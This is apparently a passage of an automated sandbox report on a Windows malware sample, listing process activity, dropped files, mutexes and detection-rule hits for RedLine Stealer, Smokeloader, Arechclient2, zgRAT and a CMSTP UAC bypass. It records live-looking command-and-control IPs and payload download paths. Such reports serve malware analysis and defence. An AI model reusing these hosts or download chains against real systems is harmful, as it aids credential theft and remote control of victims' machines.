Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: String function: 006914F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: String function: 6C944701 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: String function: 6C946320 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: String function: 00691900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Code function: String function: 00691310 appears 36 times
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: String function: 03159F27 appears 48 times
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: String function: 0042780C appears 44 times
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Code function: String function: 03177A73 appears 43 times

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 1180

Source: g77dRQ1Csm.exe, 00000000.00000003.1744307619.0000000004AAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1742146698.0000000004A73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1743378306.0000000004A69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1742090590.0000000004A69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1744753442.0000000004A57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000002.1900142864.0000000004A05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1740502555.0000000004A71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1739692264.0000000004A8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1742448933.0000000004A57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1744601177.0000000004A4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1737477677.0000000004A56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000002.1898621096.0000000003019000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1742071861.0000000004A60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1737660895.0000000004A82000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1739519083.0000000004A84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1743586340.0000000004A57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1737928184.0000000004A71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1743305315.0000000004A4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs g77dRQ1Csm.exe
Source: g77dRQ1Csm.exe, 00000000.00000003.1737614357.0000000004A6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs g77dRQ1Csm.exe

Source: g77dRQ1Csm.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 2.2.run.exe.3a2fd5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 2.2.run.exe.3a2f15b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.5427976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.run.exe.3e5286d.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5472264.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.run.exe.39eb86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5472e64.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 17.2.cmd.exe.546b264.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 15.2.run.exe.3e96d5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.run.exe.3e9615b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.cmd.exe.546be64.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.cmd.exe.542e976.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2090299966.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 3.2.cmd.exe.5e100c8.8.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f47d0000.9.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformBlock'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f47d0000.9.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f47d0000.9.raw.unpack, WinZipAesCipherStream.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@27/66@4/8

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Code function: 1_2_6C067030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6C067030

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

Code function: 2_2_006CD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

2_2_006CD660

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_02F67D8E CreateToolhelp32Snapshot,Module32First,

0_2_02F67D8E

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe

Code function: 2_2_006A8040 LoadResource,LockResource,SizeofResource,

2_2_006A8040

Source: C:\Users\user\AppData\Local\Temp\u42w.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe	Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5288
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1720

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

File created: C:\Users\user\AppData\Local\Temp\u42w.0.exe

Jump to behavior

Source: Yara match	File source: 5.0.u42w.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.1772107020.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1773870952.0000000005DF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u42w.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: five	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: five	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /1/Package.zip	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .zip	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: \run.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /BroomSetup.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_00424A0E
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: @	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.90	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.90	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.90	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: Installed	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: Installed	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.59	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.59	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.203	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.203	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /syncUpd.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /syncUpd.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /timeSync.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /timeSync.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.203	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.59	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /timeSync.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /syncUpd.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /1/Package.zip	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /1/Package.zip	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /1/Package.zip	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .zip	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .zip	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: \run.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: \run.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /BroomSetup.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /BroomSetup.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: 185.172.128.228	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: /BroomSetup.exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_03174C75
Source: C:\Users\user\Desktop\g77dRQ1Csm.exe	Command line argument: .exe	0_2_03174C75

Source: g77dRQ1Csm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u42w.3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\g77dRQ1Csm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u42w.0.exe, u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp, u42w.0.exe, 00000001.00000002.2117238412.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2104366209.000000001D23A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
